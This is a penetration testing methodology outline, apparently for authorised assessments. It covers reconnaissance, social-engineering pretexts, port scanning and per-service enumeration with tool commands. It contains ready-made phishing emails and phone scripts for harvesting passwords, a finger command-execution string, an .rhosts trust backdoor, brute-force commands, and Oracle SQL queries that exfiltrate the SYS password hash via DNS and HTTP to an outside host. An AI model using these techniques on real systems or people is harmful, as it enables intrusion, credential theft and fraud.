Penetration Testing Framework 0.50

Requirements: - Any offers to assist the project would be greatly appreciated, I have been solely working on this project for a while now and the next version, (which is available already via nightly snapshot from: http://www.vulnerabilityassessment.co.uk/Penetration Test.mm ) will be out shortly.

Any assistance or suggestions for input please send to: kev[at]vulnerabilityassessment[dot]co[dot]uk

Penetration Testing Framework 0.50
- Pre-Inspection Visit - template
- Network Footprinting (Reconnaissance) The tester would attempt to gather as much information as possible about the selected network. Reconnaissance can take two forms i.e. active and passive. A passive attack is always the best starting point as this would normally defeat intrusion detection systems and other forms of protection etc. afforded to the network. This would usually involve trying to discover publicly available information by utilising a web browser and visiting newsgroups etc. An active form would be more intrusive and may show up in audit logs and may take the form of an attempted DNS zone transfer or a social engineering type of attack.
  - Whois is widely used for querying authoritive registries/ databases to discover the owner of a domain name, an IP address, or an autonomous system number of the system you are targetting.
    - Authoritive Bodies
      - IANA - Internet Assigned Numbers Authority
      - ICANN - Internet Corporation for Assigned Names and Numbers.
      - NRO - Number Resource Organisation
      - RIR - Regional Internet Registry
        
        AFRINIC - African Network Information Centre
        
        APNIC - Asia Pacific Network Information Centre
        
        National Internet Registry
        
        APJII
        
        CNNIC
        
        JPNIC
        
        KRNIC
        
        TWNIC
        
        VNNIC
        
        ARIN - American Registry for Internet Numbers
        
        LACNIC - Latin America & Caribbean Network Information Centre
        
        RIPE - Reseaux IP Européens—Network Coordination Centre
    - Websites
      - DNS Stuff
        
        Online DNS one-stop shop, with the ability to perform a great deal of disparate DNS type queries.
      - Fixed Orbit
        
        Autonomous System lookups and other online tools available.
      - Geektools
      - Kartoo
        
        Metasearch engine that visually presents its results.
      - Netcraft
        
        Online search tool allowing queries for host information.
      - Robtex
        
        Excellent website allowing DNS and AS lookups to be performed with a graphical display of the results with pointers, A, MX records and AS connectivity displayed.
      - Traceroute.org
        
        Website listing a large number links to online traceroute resources.
      - Wayback Machine
        
        Stores older versions of websites, making it a good comparison tool and excellent resource for previously removed data.
      - Whois.net
      - Central Ops
        
        Domain Dossier
        
        Email Dossier
    - Tools
      - maltego
      - Goolag Scanner
      - IP2Location
      - Sam Spade
      - Cheops-ng
      - Domain Research Tool
      - Country whois
      - Smart whois
      - Firefox Plugins
        
        AS Number
        
        Shazou
        
        Firecat Suite
  - Internet Search
    - General Information
    - Financial
    - Phone book/ Electoral Role Information
    - Code Search
    - Google Hacking Database
    - Generic Web Searching
      - Linked To
        
        (See also Kartoo)
      - Linked From
        
        (See also Kartoo)
      - Forum Entries
      - Email Addresses
      - Contact Details
      - GHDB Results
      - Newsgroups/forums
      - Back end files
        
        .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl /
        .sh / .bat / .sql / .xls / .mdb / .conf
  - DNS Record Retrieval from publically available servers
    - Types of Information Records
      - SOA Records - Indicates the server that has authority for the domain.
      - MX Records - List of a host’s or domain’s mail exchanger server(s).
      - NS Records - List of a host’s or domain’s name server(s).
      - A Records - An address record that allows a computer name to be translated to an IP address. Each computer has to have this record for its IP address to be located via DNS.
      - PTR Records - Lists a host’s domain name, host identified by its IP address.
      - SRV Records - Service location record.
      - HINFO Records - Host information record with CPU type and operating system.
      - TXT Records - Generic text record.
      - CNAME - A host’s canonical name allows additional names/ aliases to be used to locate a computer.
      - RP - Responsible person for the domain.
    - Database Settings
      - Version.bind
      - Serial
      - Refresh
      - Retry
      - Expiry
      - Minimum
    - Sub Domains
    - Internal IP ranges
      - Reverse DNS for IP Range
    - Zone Transfer
  - Social Engineering
    - Remote
      - Phone
        
        Scenarios
        
        IT Department.
        "Hi, it's Zoe from the helpdesk. I am doing a security audit of the network
        and I need to re-synchronise the Active Directory usernames and passwords.
        
        This is so that your logon process in the morning receives no undue delays"
        
        If you are calling from a mobile number, explain that the helpdesk has been
        issued a mobile phone for 'on call' personnel.
        
        Results
        
        Contact Details
        
        Name
        
        Phone number
        
        Email
        
        Room number
        
        Department
        
        Role
      - Email
        
        Scenarios
        
        Hi there, I am currently carrying out an Active Directory Health Check
        for TARGET COMPANY and require to re-synchronise some outstanding
        accounts on behalf of the IT Service Desk. Please reply to me
        detailing the username and password you use to logon to your desktop
        in the morning. I have checked with MR JOHN DOE, the IT Security
        Advisor and he has authorised this request. I will then populate the
        database with your account details ready for re-synchronisation with
        Active Directory such that replication of your account will be
        re-established (this process is transparent to the user and so
        requires no further action from yourself). We hope that this exercise
        will reduce the time it takes for some users to logon to the network.
        
        Best Regards,
        
        Andrew Marks
        
        Good Morning,
        
        The IT Department had a critical failure last night regarding remote access to the corporate network, this will only affect users that occasionally work from home.
        
        If you have remote access, please email me with your username and access requirements e.g. what remote access system did you use? VPN and IP address etc, and we will reset the system. We are also using this 'opportunity' to increase the remote access users, so if you believe you need to work from home occasionally, please email me your usernames so I can add them to the correct groups.
        
        If you wish to retain your current credentials, also send your password. We do not require your password to carry out the maintainence, but it will change if you do not inform us of it.
        
        We apologise for any inconvenience this failure has caused and are working to resolve it as soon as possible. We also thank you for your continued patience and help.
        
        Kindest regards,
        
        lee
        EMAIL SIGNATURE
        
        Software
        
        Results
        
        Contact Details
        
        Name
        
        Phone number
        
        Email
        
        Room number
        
        Department
        
        Role
      - Other
    - Local
      - Personas
        
        Name
        
        Suggest same 1st name.
        
        Phone
        
        Give work mobile, but remember they have it!
        
        Email
        
        Have a suitable email address
        
        Business Cards
        
        Get cards printed
      - Contact Details
        
        Name
        
        Phone number
        
        Email
        
        Room number
        
        Department
        
        Role
      - Scenarios
        
        New IT employee
        
        New IT employee.
        "Hi, I'm the new guy in IT and I've been told to do a quick survey of users on the network. They give all the worst jobs to the new guys don't they? Can you help me out on this?"
        
        Get the following information, try to put a "any problems with it we can help with?" slant on it.
        Username
        Domain
        Remote access (Type - Modem/VPN)
        Remote email (OWA)
        Most used software?
        Any comments about the network?
        Any additional software you would like?
        What do you think about the security on the network? Password complexity etc.
        Now give reasons as to why they have complexity for passwords, try and get someone to give you their password and explain how you can make it more secure.
        
        "Thanks very much and you'll see the results on the company boards soon."
        
        Fire Inspector
        
        Turning up on the premise of a snap fire inspection, in line with the local government initiatives on fire safety in the workplace.
        
        Ensure you have a suitable appearance - High visibility jacket - Clipboard - ID card (fake).
        
        Check for:
        number of fire extinguishers, pressure, type.
        Fire exits, accessibility etc.
        
        Look for any information you can get. Try to get on your own, without supervision!
      - Results
      - Maps
        
        Satalitte Imagery
        
        Google Maps
        
        Building layouts
      - Other
  - Dumpster Diving
    - Rubbish Bins
    - Contract Waste Removal
    - Ebay ex-stock sales i.e. HDD
  - Web Site copy
- Discovery & Probing. Enumeration can serve two distinct purposes in an assessment:
  OS Fingerprinting
  Remote applications being served.
  OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand).
  
  Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent.
  Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent.
  
  Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
  - Default Port Lists
    - Windows
    - *nix
  - Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
    - General Enumeration Tools
      - nmap
        
        nmap -n -A -P0 -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
        
        nmap -sU -P0 -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
        
        nmap -sV -P0 -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
        
        grep "appears to be up" nmap_saved_filename | awk -F$ '{print $2}' | awk -F$ '{print $1}' > ip_list
      - netcat
        
        nc -v -w 2 -z IP_Address port_range/port_number
        
        nc -v -n IP_Address port
      - amap
        
        amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
        
        amap -bqv 192.168.1.1 80
      - xprobe2
        
        xprobe2 192.168.1.1
      - sinfp
        
        ./sinfp.pl -i -p
      - nbtscan
        
        nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) |
        (<scan_range>)
      - hping
        
        hping ip_address
      - scanrand
        
        scanrand ip_address:all
      - unicornscan
        
        unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
      - netenum
        
        netenum network/netmask timeout
      - fping
        
        fping -a -d hostname/ (Network/Subnet_Mask)
    - Firewall Specific Tools
      - firewalk
        
        firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
      - ftester
        
        host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
    - VOIP Specific Tools
      - SiVus
      - sipsak
        
        Tracing paths: - sipsak -T -s sip:usernaem@domain
        
        Options request:- sipsak -vv -s sip:username@domain
        
        Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain
      - smap
        
        smap IP_Address/Subnet_Mask
        
        smap -o IP_Address/Subnet_Mask
        
        smap -l IP_Address
      - Sipscan
    - Default Passwords (Examine list)
  - Active Hosts
    - Open TCP Ports
    - Closed TCP Ports
    - Open UDP Ports
    - Closed UDP Ports
    - Service Probing
      - SMTP Mail Bouncing
      - Banner Grabbing
        
        Other
        
        HTTP
        
        Commands
        
        JUNK / HTTP/1.0
        
        HEAD / HTTP/9.3
        
        OPTIONS / HTTP/1.0
        
        HEAD / HTTP/1.0
        
        Extensions
        
        WebDAV
        
        ASP.NET
        
        Frontpage
        
        OWA
        
        IIS ISAPI
        
        PHP
        
        OpenSSL
        
        HTTPS
        
        Use stunnel to encapsulate traffic.
        
        SMTP
        
        POP3
        
        FTP
        
        If banner altered, attempt anon logon and
        execute: 'quote help' and 'syst' commands.
    - ICMP Responses
      - Type 3 (Port Unreachable)
      - Type 8 (Echo Request)
      - Type 13 (Timestamp Request)
      - Type 15 (Information Request)
      - Type 17 (Subnet Address Mask Request)
      - Responses from broadcast address
    - Source Port Scans
      - TCP/UDP 53 (DNS)
      - TCP 20 (FTP Data)
      - TCP 80 (HTTP)
      - TCP/UDP 88 (Kerberos)
    - Firewall Assessment
      - Firewalk
      - TCP/UDP/ICMP responses
    - OS Fingerprint
- Enumeration
  - FTP port 21 open
    - Fingerprint server
      - telnet ip_address 21 (Banner grab)
      - Run command ftp ip_address
      - ftp@example.com
      - Check for anonymous access
        
        ftp ip_address
        Username: anonymous OR anon
        Password: any@email.com
    - Password guessing
    - Examine configuration files
      - ftpusers
      - ftp.conf
      - proftpd.conf
  - SSH port 22 open
    - Fingerprint server
      - telnet ip_address 22 (banner grab)
      - scanssh
        
        scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
    - Password guessing
      - ssh root@ip_address
      - guess-who
        
        ./b -l username -h ip_address -p 22 -2 < password_file_location
      - Hydra brute force
      - brutessh
    - Examine configuration files
      - ssh_config
      - sshd_config
      - authorized_keys
      - ssh_known_hosts
      - .shosts
    - SSH Client programs
      - tunnelier
      - winsshd
      - putty
      - winscp
  - Telnet port 23 open
    - Fingerprint server
      - telnet ip_address
        
        Common Banner List
        OS / Banner
        Solaris 8 / SunOS 5.8
        Solaris 2.6 / SunOS 5.6
        Solaris 2.4 or 2.5.1/ Unix(r) System V Release 4.0 (hostname)
        SunOS 4.1.x / SunOS Unix (hostname)
        FreeBSD / FreeBSD/i386 (hostname) (ttyp1)
        NetBSD / NetBSD/i386 (hostname) (ttyp1)
        OpenBSD / OpenBSD/i386 (hostname) (ttyp1)
        Red Hat 8.0 / Red Hat Linux release 8.0 (Psyche)
        Debian 3.0 / Debian GNU/Linux 3.0 / hostname
        SGI IRIX 6.x / IRIX (hostname)
        IBM AIX 4.1.x / AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.
        IBM AIX 4.2.x or 4.3.x/ AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.
        Nokia IPSO / IPSO (hostname) (ttyp0)
        Cisco IOS / User Access Verification
        Livingston ComOS/ ComOS - Livingston PortMaster
      - telnetfp
    - Password Attack
      - Common passwords
      - Hydra brute force
      - Brutus
      - telnet -l "-froot" hostname (Solaris 10+)
    - Examine configuration files
      - /etc/inetd.conf
      - /etc/xinetd.d/telnet
      - /etc/xinetd.d/stelnet
  - Sendmail Port 25 open
    - Fingerprint server
      - telnet ip_address 25 (banner grab)
    - Mail Server Testing
      - Enumerate users
        
        VRFY username (verifies if username exists - enumeration of accounts)
        
        EXPN username (verifies if username is valid - enumeration of accounts)
      - Mail Spoof Test
        
        HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
      - Mail Relay Test
        
        HELO anything
        
        Identical to/from - mail from: <nobody@domain> rcpt to: <nobody@domain>
        
        Unknown domain - mail from: <user@unknown_domain>
        
        Domain not present - mail from: <user@localhost>
        
        Domain not supplied - mail from: <user>
        
        Source address omission - mail from: <> rcpt to: <nobody@recipient_domain>
        
        Use IP address of target server - mail from: <user@IP_Address> rcpt to: <nobody@recipient_domain>
        
        Use double quotes - mail from: <user@domain> rcpt to: <"user@recipent-domain">
        
        User IP address of the target server - mail from: <user@domain> rcpt to: <nobody@recipient_domain@[IP Address]>
        
        Disparate formatting - mail from: <user@[IP Address]> rcpt to: <@domain:nobody@recipient-domain>
        
        Disparate formatting2 - mail from: <user@[IP Address]> rcpt to: <recipient_domain!nobody@[IP Address]>
    - Examine Configuration Files
      - sendmail.cf
      - submit.cf
  - DNS port 53 open
    - Fingerprint server/ service
      - host
        
        host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ]
        -v verbose format
        -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR.
        -a Same as –t ANY.
        -l Zone transfer (if allowed).
        -f Save to a specified filename.
      - nslookup
        
        nslookup [ -option ... ] [ host-to-find | - [ server ]]
      - dig
        
        dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
      - whois
        -h Use the named host to resolve the query
        -a Use ARIN to resolve the query
        -r Use RIPE to resolve the query
        -p Use APNIC to resolve the query
        -Q Perform a quick lookup
    - DNS Enumeration
      - Bile Suite
        
        perl BiLE.pl [website] [project_name]
        
        perl BiLE-weigh.pl [website] [input file]
        
        perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
        
        perl vet-mx.pl [input file] [true domain file] [output file]
        
        perl exp-tld.pl [input file] [output file]
        
        perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
        
        perl qtrace.pl [ip_address_file] [output_file]
        
        perl jarf-rev [subnetblock] [nameserver]
      - txdns
        
        txdns -rt -t domain_name
        
        txdns -x 50 -bb domain_name
        
        txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt
    - Examine Configuration Files
      - host.conf
      - resolv.conf
      - named.conf
  - TFTP port 69 open
    - TFTP Enumeration
      - tftp ip_address PUT local_file
      - tftp ip_address GET conf.txt (or other files)
      - Solarwinds TFTP server
    - TFTP Bruteforcing
      - TFTP bruteforcer
      - Cisco-Torch
  - Finger Port 79 open
    - User enumeration
      - finger 'a b c d e f g h' @example.com
      - finger '1 2 3 4 5 6 7 8 9 0'@example.com
      - finger user@example.com
      - finger 0@example.com
      - finger .@example.com
      - finger **@example.com
      - finger test@example.com
      - finger @example.com
    - Command execution
      - finger "|/bin/id@example.com"
      - finger "|/bin/ls -a /@example.com"
    - Finger Bounce
      - finger user@host@victim
      - finger @internal@external
  - Web Ports 80, 8080 etc. open
    - Fingerprint server
      - Telnet ip_address port
      - Firefox plugins
        
        asnumber
        
        header spy
        
        live http headers
        
        shazou
        
        add n edit cookies
    - Crawl website
      - lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
      - httprint
    - Web Directory enumeration
      - Nikto
        
        nikto [-h target] [options]
      - DirBuster
      - Wikto
      - Goolag Scanner
    - Vulnerability Assessment
      - Acunetix
      - NStealth
      - w3af
      - Obiwan III
    - Proxy Testing
      - Suru
      - Crowbar
      - Paros
      - Burpsuite
      - webscarab
      - requester raw
      - interceptor
    - Examine configuration files
      - Examine httpd.conf/ windows config files
  - NTP Port 123 open
    - NTP Enumeration
      - ntpdc -c monlist IP_ADDRESS
      - ntpdc -c sysinfo IP_ADDRESS
      - ntpq
        
        host
        
        hostname
        
        ntpversion
        
        version
        
        readlist
    - Examine configuration files
      - ntp.conf
  - NetBIOS Ports 135-139,445 open
    - NetBIOS enumeration
      - Null Session
        
        net use \\192.168.1.1\ipc$ "" /u:""
        
        net view \\ip_address
        
        Dumpsec
      - Superscan
        
        Enumeration tab.
      - Enum
        
        enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
      - Winfo
      - user2sid/sid2user
      - smbclient -L //server/share password options
    - NetBIOS brute force
    - Examine Configuration Files
      - Smb.conf
      - lmhosts
  - SNMP port 161 open
    - Default Community Strings
      - public
      - private
      - cisco
        
        cable-docsis
        
        ILMI
    - MIB enumeration
      - Windows NT
        
        .1.3.6.1.2.1.1.5 Hostnames
        
        .1.3.6.1.4.1.77.1.4.2 Domain Name
        
        .1.3.6.1.4.1.77.1.2.25 Usernames
        
        .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
        
        .1.3.6.1.4.1.77.1.2.27 Share Information
      - Solarwinds MIB walk
      - Getif
      - snmpwalk
        
        snmpwalk -v <Version> -c <Community string> <IP>
      - Snscan
    - SNMP Bruteforce
      - onesixtyone
        
        onesixytone -c SNMP.wordlist <IP>
      - cat
        
        ./cat -h <IP> -w SNMP.wordlist
      - Solarwinds SNMP Brute Force
      - ADMsnmp
    - Examine SNMP Configuration files
      - snmp.conf
      - snmpd.conf
      - snmp-config.xml
  - LDAP Port 389 Open
    - ldap enumeration
      - ldapminer
        
        ldapminer -h ip_address -p port (not required if default) -d
      - luma
        
        Gui based tool
      - ldp
        
        Gui based tool
      - openldap
        
        ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
        
        ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        
        ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
        
        ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
        
        ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
    - ldap brute force
      - bf_ldap
        
        bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
      - LDAP_Brute.pl
      - K0ldS
    - Examine Configuration Files
      - ldap.conf
      - ldap.cfg
      - slapd.conf
      - containers.ldif
      - Sun ONE Directory Server 5.1
        
        75sas.ldif
      - Netscape Directory Server 4
        
        nsslapd.sas_at.conf
        
        nsslapd.sas_oc.conf
      - OpenLDAP directory server
        
        slapd.sas_at.conf
        
        slapd.sas_oc.conf
      - IBM SecureWay V3 server
        
        V3.sas.oc
      - Microsoft Active Directory server
        
        msadClassesAttrs.ldif
  - rlogin port 513 open
    - Rlogin Enumeration
      - rlogin hostname -l username
      - cat .rhosts
    - Rlogin Brute force
      - echo ++ > .rhosts
      - Hydra
  - rsh port 514 open
    - Rsh Enumeration
      - rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
    - Rsh Brute Force
      - rsh-grind
      - Hydra
      - medusa
  - SQL Server Port 1433 1434 open
    - SQL Enumeration
      - SQLPing2
      - SQL Recon
      - piggy
      - SQLPing
        
        sqlping ip_address/hostname
      - SQLver
      - SQLpoke
    - SQL Brute Force
      - SQLPAT
        
        sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
        
        sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
      - SQL Dict
      - SQLAT
      - Hydra
      - SQLlhf
      - ForceSQL
  - Citrix port 1494 open
    - Citrix Enumeration
      - Default Domain
      - Published Applications
        
        ./citrix-pa-scan {IP_address/file | - | random} [timeout]
        
        citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
    - Citrox Brute Force
      - bforce.js
      - connect.js
      - Citrix Brute-forcer
      - Reference Material
        
        Hacking Citrix - the lame way
        
        Hacking Citrix - the forceful way
  - Oracle Port 1521 Open
    - Oracle Enumeration
      - Sidguess
      - scuba
      - Repscan
      - oracsec
      - DNS/HTTP Enumeration
        
        SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
        
        SQL> select utl_http.request('http://gladius:5500/'||(SELECT PASSWORD FROM DBA_U SERS WHERE USERNAME='SYS')) from dual;
      - Run WinSID
      - Oracle default password list
      - TNSVer
        
        tnsver host [port]
      - TCP Scan
      - Run Oracle TNSLSNR
        
        Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
      - Run TNSCmd
        
        perl tnscmd.pl -h ip_address
        
        perl tnscmd.pl version -h ip_address